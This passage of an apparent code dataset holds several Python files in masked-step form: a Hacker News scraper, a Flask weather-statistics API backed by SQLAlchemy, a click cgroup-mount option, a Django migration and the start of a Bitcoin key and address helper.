\"\"\"{\"Rownumber\": %d,\n \"title\": \"%s\",\n \"autor\": \"%s\",\n \"url\": \"%s\",\n \"site\": \"%s\",\n }\n\"\"\"\n % (rownumber, title, autor, url, site))\n return line\n\n def getNews(rownews):\n newsdict = {}\n for news in rownews:\n newsdict['title'] = ''.join(news.xpath('./a/text()'))\n for i in news.xpath('./a'):\n newsdict['url'] = i.get('href')\n newsdict['site'] = ''.join(news.xpath('./span/a/span/text()'))\n return newsdict\n\n def getAuthor(rowautor):\n authordict = {}\n for author in rowautor:\n authordict['autor'] = ''.join(author.xpath('./a[1]/text()'))\n return authordict\n for row in parsed_body.xpath('//tr'):\n rownews = row.xpath('./td[@class=\"title\"][2]')\n rowautor = row.xpath('./td[@class=\"subtext\"][1]')\n datadict = {}\n rowdata = {}\n if rownews:\n datadict = getNews(rownews)\n if rowautor:\n for author in rowautor:\n datadict = getAuthor(rowautor)\n if datadict:\n autor = ''\n try:\n title = datadict['title']\n url = datadict['url']\n site = datadict['site']\n except KeyError:\n autor = datadict['autor']\n if autor:\n rowdata['rownumber'] = str(rownumber)\n rowdata['title'] = str(title)\n rowdata['autor'] = str(autor)\n rowdata['url'] = str(url)\n rowdata['site'] = str(site)\n with open('nix.json', mode='a') as f:\n json.dump(rowdata, f)\n rownumber += 1\n if rownumber > 2:\n exit()\n return rownumber\n\n def __unicode__(self):\n return unicode(self.rowdata)\n pageflag = True\n rownumber = 1\n pageparse = siteurl\n with open('nix.json', mode='w') as f:\n json.dump('', f)\n while pageflag:\n response = requests.get(pageparse)\n parsed_body = html.fromstring(response.text)\n rownumber = parsePage(parsed_body, rownumber) - 1\n pageparse = siteurl + getNextPage(pageparse)\n if pageparse == siteurl:\n pageflag = False\n\n\nif __name__ == '__main__':\n ycombinatorParser()\n", "step-4": "import requests\nimport csv\nfrom lxml import html\nimport json\n\n\nclass ycombinatorParser:\n siteurl = 'https://news.ycombinator.com/'\n\n def getNextPage(pageurl):\n response = requests.get(pageurl)\n parsed_body = html.fromstring(response.text)\n nextpage = parsed_body.xpath('//a[@class=\"morelink\"]')\n try:\n nexthref = nextpage[0].get('href')\n except IndexError:\n nexthref = ''\n return nexthref\n\n def parsePage(parsed_body, rownumber):\n\n def jsonWriteLine(rownumber, title, autor, url, site):\n line = (\n \"\"\"{\"Rownumber\": %d,\n \"title\": \"%s\",\n \"autor\": \"%s\",\n \"url\": \"%s\",\n \"site\": \"%s\",\n }\n\"\"\"\n % (rownumber, title, autor, url, site))\n return line\n\n def getNews(rownews):\n newsdict = {}\n for news in rownews:\n newsdict['title'] = ''.join(news.xpath('./a/text()'))\n for i in news.xpath('./a'):\n newsdict['url'] = i.get('href')\n newsdict['site'] = ''.join(news.xpath('./span/a/span/text()'))\n return newsdict\n\n def getAuthor(rowautor):\n authordict = {}\n for author in rowautor:\n authordict['autor'] = ''.join(author.xpath('./a[1]/text()'))\n return authordict\n for row in parsed_body.xpath('//tr'):\n rownews = row.xpath('./td[@class=\"title\"][2]')\n rowautor = row.xpath('./td[@class=\"subtext\"][1]')\n datadict = {}\n rowdata = {}\n if rownews:\n datadict = getNews(rownews)\n if rowautor:\n for author in rowautor:\n datadict = getAuthor(rowautor)\n if datadict:\n autor = ''\n try:\n title = datadict['title']\n url = datadict['url']\n site = datadict['site']\n except KeyError:\n autor = datadict['autor']\n if autor:\n rowdata['rownumber'] = str(rownumber)\n rowdata['title'] = str(title)\n rowdata['autor'] = str(autor)\n rowdata['url'] = str(url)\n rowdata['site'] = str(site)\n with open('nix.json', mode='a') as f:\n json.dump(rowdata, f)\n rownumber += 1\n if rownumber > 2:\n exit()\n return rownumber\n\n def __unicode__(self):\n return unicode(self.rowdata)\n pageflag = True\n rownumber = 1\n pageparse = siteurl\n with open('nix.json', mode='w') as f:\n json.dump('', f)\n while pageflag:\n response = requests.get(pageparse)\n parsed_body = html.fromstring(response.text)\n rownumber = parsePage(parsed_body, rownumber) - 1\n pageparse = siteurl + getNextPage(pageparse)\n if pageparse == siteurl:\n pageflag = False\n\n\nif __name__ == '__main__':\n ycombinatorParser()\n", "step-5": "# -*- coding: utf-8 -*-\nimport requests\nimport csv\nfrom lxml import html\nimport json\n\nclass ycombinatorParser():\n siteurl = 'https://news.ycombinator.com/' \n\n def getNextPage(pageurl):\n response = requests.get(pageurl)\n parsed_body = html.fromstring(response.text)\n nextpage=parsed_body.xpath('//a[@class=\"morelink\"]')\n try:\n nexthref=nextpage[0].get('href')\n except IndexError:\n nexthref = ''\n return nexthref \n\n\n def parsePage(parsed_body,rownumber):\n def jsonWriteLine(rownumber,title,autor,url,site):\n line = '{\"Rownumber\": %d,\\n \"title\": \"%s\",\\n \"autor\": \"%s\",\\n \"url\": \"%s\",\\n \"site\": \"%s\",\\n }\\n' %(rownumber,title,autor,url,site)\n #print line\n return line\n\n def getNews(rownews):\n newsdict = {}\n for news in rownews:\n newsdict[\"title\"] = ''.join(news.xpath('./a/text()'))\n for i in news.xpath('./a'):\n newsdict[\"url\"] = i.get('href')\n newsdict[\"site\"] = ''.join(news.xpath('./span/a/span/text()'))\n return newsdict\n\n def getAuthor(rowautor):\n authordict = {}\n for author in rowautor:\n authordict[\"autor\"] = ''.join(author.xpath('./a[1]/text()'))\n return authordict\n\n for row in parsed_body.xpath('//tr'):\n rownews = row.xpath('./td[@class=\"title\"][2]')\n rowautor = row.xpath('./td[@class=\"subtext\"][1]')\n datadict = {}\n rowdata = {}\n if rownews:\n datadict = getNews(rownews)\n if rowautor:\n for author in rowautor:\n datadict = getAuthor(rowautor)\n\n if datadict:\n autor = ''\n try:\n title=datadict[\"title\"]\n url=datadict[\"url\"]\n site=datadict[\"site\"]\n except KeyError:\n autor = datadict[\"autor\"]\n\n if autor:\n rowdata['rownumber'] = str(rownumber)\n rowdata['title'] = str(title)\n rowdata['autor'] = str(autor)\n rowdata['url'] = str(url)\n rowdata['site'] = str(site)\n \n with open('nix.json',mode='a') as f:\n json.dump(rowdata,f)\n \n #outputfile.write(jsonWriteLine(rownumber,title,autor,url,site)) \n \n #print jsonWriteLine(rownumber,title,autor,url,site)\n rownumber += 1\n if rownumber>2:\n exit()\n return rownumber\n \n def __unicode__(self):\n return unicode(self.rowdata)\n \n pageflag = True\n rownumber = 1\n pageparse = siteurl\n with open('nix.json',mode='w') as f:\n json.dump('',f)\n while pageflag: \n response = requests.get(pageparse)\n parsed_body = html.fromstring(response.text) \n\n rownumber = parsePage(parsed_body,rownumber)-1\n\n pageparse = siteurl+getNextPage(pageparse)\n if pageparse == siteurl:\n pageflag = False\nif __name__ == '__main__':\n ycombinatorParser()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
#dependencies go here import numpy as np import datetime as dt from datetime import timedelta import sqlalchemy from sqlalchemy.ext.automap import automap_base from sqlalchemy.orm import Session from sqlalchemy import create_engine, func from flask import Flask, jsonify #Set up the engine to connect to HW8 database postgresStr = ("postgresql://postgres:password@localhost:5432/HW8-sqlalchemy-vacation") engine = create_engine(postgresStr) # reflect existing tables/classes Base = automap_base() Base.prepare(engine, reflect=True) # Save reference to the tables Measurement = Base.classes.measurements Station = Base.classes.station # Flask Setup app = Flask(__name__) # Set up flask routes @app.route("/") def home(): """List all available api routes.""" return ( f"Available Routes:<br/>" f"/api/v1.0/precipitation<br/>" f"/api/v1.0/stations<br/>" f"/api/v1.0/tobs<br/>" f"/api/v1.0/<start><br/>" f"/api/v1.0/<start>/<end><br/>" ) @app.route("/api/v1.0/precipitation") def precip(): #Convert the query results to a Dictionary using `date` as the key and `prcp` as the value. #Return the JSON representation of your dictionary. # Create our session (link) from Python to the DB session = Session(engine) #query the db, get a list of all precip measurements and dates results = session.query(Measurement.date, Measurement.prcp).all() session.close() # Convert list of tuples into normal list precip = list(np.ravel(results)) return jsonify(precip) @app.route("/api/v1.0/stations") def stations(): #Return a JSON list of stations from the dataset # Create our session (link) from Python to the DB session = Session(engine) #query the db, get a list of the stations and their respective names results = session.query(Station.station, Station.name).all() session.close() # Convert list of tuples into normal list stationlist = list(np.ravel(results)) return jsonify(stationlist) #query for the dates and temperature observations from a year from the last data point. # return a JSON list of Temperature Observations (tobs) for the previous year. @app.route("/api/v1.0/tobs") def tobs(): # Create our session (link) from Python to the DB session = Session(engine) #find the last date in the dataset, query the prior year's temperature observations last = session.query(func.max(Measurement.date)).limit(1).all() q_end = last[0][0].strftime("%Y-%m-%d") q_start = (last[0][0]-dt.timedelta(days = 365)).strftime("%Y-%m-%d") tobs_results = session.query(Measurement.date, Measurement.tobs).\ filter(Measurement.date < q_end).\ filter(Measurement.date >= q_start).all() session.close() # Convert list of tuples into normal list tobslist = list(np.ravel(tobs_results)) return jsonify(tobslist) @app.route("/api/v1.0/<start>") def startonly(start): # Create our session (link) from Python to the DB session = Session(engine) #find the last date in the dataset to use as an ending point for our temperature calculations last = session.query(func.max(Measurement.date)).limit(1).all() q_end = last[0][0].strftime("%Y-%m-%d") stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\ filter(Measurement.date >= start).\ filter(Measurement.date <= q_end).all() statslist = list(np.ravel(stats)) return jsonify({"StartDate":start,"EndDate":q_end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]}) #Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range. #When given the start only, calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date. @app.route("/api/v1.0/<start>/<end>") def daterange(start,end): # Create our session (link) from Python to the DB session = Session(engine) stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\ filter(Measurement.date >= start).\ filter(Measurement.date <= end).all() statslist = list(np.ravel(stats2)) return jsonify({"StartDate":start,"EndDate":end,"TMIN": statslist[0],"TAVG":statslist[1],"TMAX":statslist[2]}) #Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range. #When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive. if __name__ == '__main__': app.run(debug=True)
normal
{ "blob_id": "7ab964352c1d51b70e3a1a7bf0a624f2d96cfd55", "index": 8168, "step-1": "<mask token>\n\n\n@app.route('/')\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f'Available Routes:<br/>/api/v1.0/precipitation<br/>/api/v1.0/stations<br/>/api/v1.0/tobs<br/>/api/v1.0/<start><br/>/api/v1.0/<start>/<end><br/>'\n )\n\n\n<mask token>\n\n\n@app.route('/api/v1.0/tobs')\ndef tobs():\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n q_start = (last[0][0] - dt.timedelta(days=365)).strftime('%Y-%m-%d')\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(\n Measurement.date < q_end).filter(Measurement.date >= q_start).all()\n session.close()\n tobslist = list(np.ravel(tobs_results))\n return jsonify(tobslist)\n\n\n@app.route('/api/v1.0/<start>')\ndef startonly(start):\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.\n tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= q_end).all()\n statslist = list(np.ravel(stats))\n return jsonify({'StartDate': start, 'EndDate': q_end, 'TMIN': statslist\n [0], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@app.route('/')\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f'Available Routes:<br/>/api/v1.0/precipitation<br/>/api/v1.0/stations<br/>/api/v1.0/tobs<br/>/api/v1.0/<start><br/>/api/v1.0/<start>/<end><br/>'\n )\n\n\n@app.route('/api/v1.0/precipitation')\ndef precip():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n precip = list(np.ravel(results))\n return jsonify(precip)\n\n\n@app.route('/api/v1.0/stations')\ndef stations():\n session = Session(engine)\n results = session.query(Station.station, Station.name).all()\n session.close()\n stationlist = list(np.ravel(results))\n return jsonify(stationlist)\n\n\n@app.route('/api/v1.0/tobs')\ndef tobs():\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n q_start = (last[0][0] - dt.timedelta(days=365)).strftime('%Y-%m-%d')\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(\n Measurement.date < q_end).filter(Measurement.date >= q_start).all()\n session.close()\n tobslist = list(np.ravel(tobs_results))\n return jsonify(tobslist)\n\n\n@app.route('/api/v1.0/<start>')\ndef startonly(start):\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.\n tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= q_end).all()\n statslist = list(np.ravel(stats))\n return jsonify({'StartDate': start, 'EndDate': q_end, 'TMIN': statslist\n [0], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\n@app.route('/api/v1.0/<start>/<end>')\ndef daterange(start, end):\n session = Session(engine)\n stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement\n .tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= end).all()\n statslist = list(np.ravel(stats2))\n return jsonify({'StartDate': start, 'EndDate': end, 'TMIN': statslist[0\n ], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\n<mask token>\n", "step-3": "<mask token>\nBase.prepare(engine, reflect=True)\n<mask token>\n\n\n@app.route('/')\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f'Available Routes:<br/>/api/v1.0/precipitation<br/>/api/v1.0/stations<br/>/api/v1.0/tobs<br/>/api/v1.0/<start><br/>/api/v1.0/<start>/<end><br/>'\n )\n\n\n@app.route('/api/v1.0/precipitation')\ndef precip():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n precip = list(np.ravel(results))\n return jsonify(precip)\n\n\n@app.route('/api/v1.0/stations')\ndef stations():\n session = Session(engine)\n results = session.query(Station.station, Station.name).all()\n session.close()\n stationlist = list(np.ravel(results))\n return jsonify(stationlist)\n\n\n@app.route('/api/v1.0/tobs')\ndef tobs():\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n q_start = (last[0][0] - dt.timedelta(days=365)).strftime('%Y-%m-%d')\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(\n Measurement.date < q_end).filter(Measurement.date >= q_start).all()\n session.close()\n tobslist = list(np.ravel(tobs_results))\n return jsonify(tobslist)\n\n\n@app.route('/api/v1.0/<start>')\ndef startonly(start):\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.\n tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= q_end).all()\n statslist = list(np.ravel(stats))\n return jsonify({'StartDate': start, 'EndDate': q_end, 'TMIN': statslist\n [0], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\n@app.route('/api/v1.0/<start>/<end>')\ndef daterange(start, end):\n session = Session(engine)\n stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement\n .tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= end).all()\n statslist = list(np.ravel(stats2))\n return jsonify({'StartDate': start, 'EndDate': end, 'TMIN': statslist[0\n ], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "import numpy as np\nimport datetime as dt\nfrom datetime import timedelta\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\npostgresStr = (\n 'postgresql://postgres:password@localhost:5432/HW8-sqlalchemy-vacation')\nengine = create_engine(postgresStr)\nBase = automap_base()\nBase.prepare(engine, reflect=True)\nMeasurement = Base.classes.measurements\nStation = Base.classes.station\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f'Available Routes:<br/>/api/v1.0/precipitation<br/>/api/v1.0/stations<br/>/api/v1.0/tobs<br/>/api/v1.0/<start><br/>/api/v1.0/<start>/<end><br/>'\n )\n\n\n@app.route('/api/v1.0/precipitation')\ndef precip():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n precip = list(np.ravel(results))\n return jsonify(precip)\n\n\n@app.route('/api/v1.0/stations')\ndef stations():\n session = Session(engine)\n results = session.query(Station.station, Station.name).all()\n session.close()\n stationlist = list(np.ravel(results))\n return jsonify(stationlist)\n\n\n@app.route('/api/v1.0/tobs')\ndef tobs():\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n q_start = (last[0][0] - dt.timedelta(days=365)).strftime('%Y-%m-%d')\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(\n Measurement.date < q_end).filter(Measurement.date >= q_start).all()\n session.close()\n tobslist = list(np.ravel(tobs_results))\n return jsonify(tobslist)\n\n\n@app.route('/api/v1.0/<start>')\ndef startonly(start):\n session = Session(engine)\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime('%Y-%m-%d')\n stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.\n tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= q_end).all()\n statslist = list(np.ravel(stats))\n return jsonify({'StartDate': start, 'EndDate': q_end, 'TMIN': statslist\n [0], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\n@app.route('/api/v1.0/<start>/<end>')\ndef daterange(start, end):\n session = Session(engine)\n stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement\n .tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start\n ).filter(Measurement.date <= end).all()\n statslist = list(np.ravel(stats2))\n return jsonify({'StartDate': start, 'EndDate': end, 'TMIN': statslist[0\n ], 'TAVG': statslist[1], 'TMAX': statslist[2]})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "#dependencies go here\nimport numpy as np\nimport datetime as dt\nfrom datetime import timedelta\n\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n\n\n\n#Set up the engine to connect to HW8 database\npostgresStr = (\"postgresql://postgres:password@localhost:5432/HW8-sqlalchemy-vacation\")\nengine = create_engine(postgresStr)\n\n# reflect existing tables/classes\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# Save reference to the tables\nMeasurement = Base.classes.measurements\nStation = Base.classes.station\n\n# Flask Setup\napp = Flask(__name__)\n\n# Set up flask routes\n@app.route(\"/\")\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:<br/>\"\n f\"/api/v1.0/precipitation<br/>\"\n f\"/api/v1.0/stations<br/>\"\n f\"/api/v1.0/tobs<br/>\"\n f\"/api/v1.0/<start><br/>\"\n f\"/api/v1.0/<start>/<end><br/>\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precip():\n \n #Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.\n #Return the JSON representation of your dictionary.\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n #query the db, get a list of all precip measurements and dates\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n # Convert list of tuples into normal list\n precip = list(np.ravel(results))\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n \n #Return a JSON list of stations from the dataset\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n #query the db, get a list of the stations and their respective names\n results = session.query(Station.station, Station.name).all()\n\n session.close()\n\n # Convert list of tuples into normal list\n stationlist = list(np.ravel(results))\n return jsonify(stationlist)\n\n#query for the dates and temperature observations from a year from the last data point.\n# return a JSON list of Temperature Observations (tobs) for the previous year.\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \n #find the last date in the dataset, query the prior year's temperature observations\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime(\"%Y-%m-%d\")\n q_start = (last[0][0]-dt.timedelta(days = 365)).strftime(\"%Y-%m-%d\")\n \n tobs_results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date < q_end).\\\n filter(Measurement.date >= q_start).all()\n \n session.close()\n\n # Convert list of tuples into normal list\n tobslist = list(np.ravel(tobs_results))\n \n return jsonify(tobslist)\n\n@app.route(\"/api/v1.0/<start>\")\ndef startonly(start):\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n \n #find the last date in the dataset to use as an ending point for our temperature calculations\n last = session.query(func.max(Measurement.date)).limit(1).all()\n q_end = last[0][0].strftime(\"%Y-%m-%d\")\n \n stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).\\\n filter(Measurement.date <= q_end).all()\n\n statslist = list(np.ravel(stats))\n \n return jsonify({\"StartDate\":start,\"EndDate\":q_end,\"TMIN\": statslist[0],\"TAVG\":statslist[1],\"TMAX\":statslist[2]})\n\n #Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.\n #When given the start only, calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date.\n\n@app.route(\"/api/v1.0/<start>/<end>\")\ndef daterange(start,end):\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n \n stats2 = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).\\\n filter(Measurement.date <= end).all()\n\n statslist = list(np.ravel(stats2))\n \n return jsonify({\"StartDate\":start,\"EndDate\":end,\"TMIN\": statslist[0],\"TAVG\":statslist[1],\"TMAX\":statslist[2]})\n\n #Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.\n #When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive.\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-ids": [ 3, 6, 7, 9, 10 ] }
[ 3, 6, 7, 9, 10 ]
""" Mount /sys/fs/cgroup Option """ from typing import Callable import click def cgroup_mount_option(command: Callable[..., None]) -> Callable[..., None]: """ Option for choosing to mount `/sys/fs/cgroup` into the container. """ function = click.option( '--mount-sys-fs-cgroup/--no-mount-sys-fs-cgroup', default=True, show_default=True, help=( 'Mounting ``/sys/fs/cgroup`` from the host is required to run ' 'applications which require ``cgroup`` isolation. ' 'Choose to not mount ``/sys/fs/cgroup`` if it is not available on ' 'the host.' ), )(command) # type: Callable[..., None] return function
normal
{ "blob_id": "237f5e2e37187e26b5628032e37d3a525ef72b9a", "index": 7261, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef cgroup_mount_option(command: Callable[..., None]) ->Callable[..., None]:\n \"\"\"\n Option for choosing to mount `/sys/fs/cgroup` into the container.\n \"\"\"\n function = click.option('--mount-sys-fs-cgroup/--no-mount-sys-fs-cgroup',\n default=True, show_default=True, help=\n 'Mounting ``/sys/fs/cgroup`` from the host is required to run applications which require ``cgroup`` isolation. Choose to not mount ``/sys/fs/cgroup`` if it is not available on the host.'\n )(command)\n return function\n", "step-3": "<mask token>\nfrom typing import Callable\nimport click\n\n\ndef cgroup_mount_option(command: Callable[..., None]) ->Callable[..., None]:\n \"\"\"\n Option for choosing to mount `/sys/fs/cgroup` into the container.\n \"\"\"\n function = click.option('--mount-sys-fs-cgroup/--no-mount-sys-fs-cgroup',\n default=True, show_default=True, help=\n 'Mounting ``/sys/fs/cgroup`` from the host is required to run applications which require ``cgroup`` isolation. Choose to not mount ``/sys/fs/cgroup`` if it is not available on the host.'\n )(command)\n return function\n", "step-4": "\"\"\"\nMount /sys/fs/cgroup Option\n\"\"\"\n\nfrom typing import Callable\n\nimport click\n\n\ndef cgroup_mount_option(command: Callable[..., None]) -> Callable[..., None]:\n \"\"\"\n Option for choosing to mount `/sys/fs/cgroup` into the container.\n \"\"\"\n function = click.option(\n '--mount-sys-fs-cgroup/--no-mount-sys-fs-cgroup',\n default=True,\n show_default=True,\n help=(\n 'Mounting ``/sys/fs/cgroup`` from the host is required to run '\n 'applications which require ``cgroup`` isolation. '\n 'Choose to not mount ``/sys/fs/cgroup`` if it is not available on '\n 'the host.'\n ),\n )(command) # type: Callable[..., None]\n return function\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Generated by Django 3.1.1 on 2020-10-29 13:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('registered_user', '0005_auto_20201029_1710'), ] operations = [ migrations.AlterField( model_name='user_details', name='dateofbirth', field=models.DateField(null=True), ), ]
normal
{ "blob_id": "f2c96b3133137019dc6bd462f096f3b4c5f12648", "index": 6635, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('registered_user', '0005_auto_20201029_1710')]\n operations = [migrations.AlterField(model_name='user_details', name=\n 'dateofbirth', field=models.DateField(null=True))]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('registered_user', '0005_auto_20201029_1710')]\n operations = [migrations.AlterField(model_name='user_details', name=\n 'dateofbirth', field=models.DateField(null=True))]\n", "step-5": "# Generated by Django 3.1.1 on 2020-10-29 13:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('registered_user', '0005_auto_20201029_1710'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user_details',\n name='dateofbirth',\n field=models.DateField(null=True),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python # coding: utf-8 #%%: import secrets import hashlib import base64 import ecdsa from sys import byteorder #%%: class k_box: def __init__(self, string = 0, file = 0): if string != 0: if not(len(string) == 64): raise Exception("Bad len") self.__priv_key = bytes.fromhex(string) else: self.__priv_key = secrets.randbits(256).to_bytes(32,byteorder=byteorder) self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.SECP256k1).verifying_key.to_string() def get_secret_key(self): return self.__priv_key def get_public_key(self)->bytearray: return (0x04.to_bytes(1,byteorder=byteorder) + self.__pub_key) def get_public_key_compresed(self) -> bytearray: return (b'\x03' if self.__pub_key[-1] % 2 else b'\x02') + self.__pub_key[0:32] def get_address(self) -> str: e_pub = self.get_encrypted_pub_key() main_net_key = 0x00.to_bytes(1,byteorder=byteorder) + e_pub check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[:4] hex_addr = main_net_key + check_sum return base58_encode(hex_addr) def get_encrypted_pub_key(self): sha = hashlib.sha256(self.get_public_key_compresed()).digest() result = hashlib.new(name='ripemd160', data=sha).digest() return result def sign(self, message:bytes = 0) -> bytearray: sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.SECP256k1 ) return sk.sign(message) def verify(self, signature, message): vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.SECP256k1) return vk.verify(signature, message.encode()) #%%: def covert_to_address(pub_key:bytes) -> str: sha = hashlib.sha256(pub_key).digest() pub_key = hashlib.new(name='ripemd160', data=sha).digest() main_net_key = 0x00.to_bytes(1,byteorder=byteorder) + pub_key check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[:4] hex_addr = main_net_key + check_sum return base58_encode(hex_addr) #%%: def base58_encode(n:bytearray)->str: alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' b58_string = "" leading_zeros = len(n.hex()) - len(n.hex().lstrip('0')) # ! refactor counting zeros address_int = int.from_bytes(n,byteorder="big") while address_int > 0: digit = address_int % 58 digit_char = alphabet[digit] b58_string = digit_char + b58_string address_int //= 58 ones = leading_zeros // 2 for one in range(ones): b58_string = '1' + b58_string return b58_string def base58_decode(s): """Decode a base58-encoding string, returning bytes""" if not s: return b'' alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' # Convert the string to an integer n = 0 for c in s: n *= 58 if c not in alphabet: raise Exception('Character %r is not a valid base58 character' % c) digit = alphabet.index(c) n += digit # Convert the integer to bytes h = '%x' % n if len(h) % 2: h = '0' + h # res = "" res = bytearray.fromhex(h) # Add padding back. pad = 0 for c in s[:-1]: if c == alphabet[0]: pad += 1 else: break return b'\x00' * pad + res # def base58_decode(s:str, len): # alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' # result = 0 # for c in s: # result = result * 58 + alphabet.index(c) # return bytearray.fromhex(f"{result:0x}".rjust(len * 2, '0')) # %%: def to_WIF(key:str): if not(len(key) == 64): raise Exception("Bad key len") key = "80" + key key_b = bytes.fromhex(key) sha_key1 = hashlib.sha256(hashlib.sha256(key_b).digest()).digest() key_b = key_b + sha_key1[0:4] return base58_encode(key_b) def 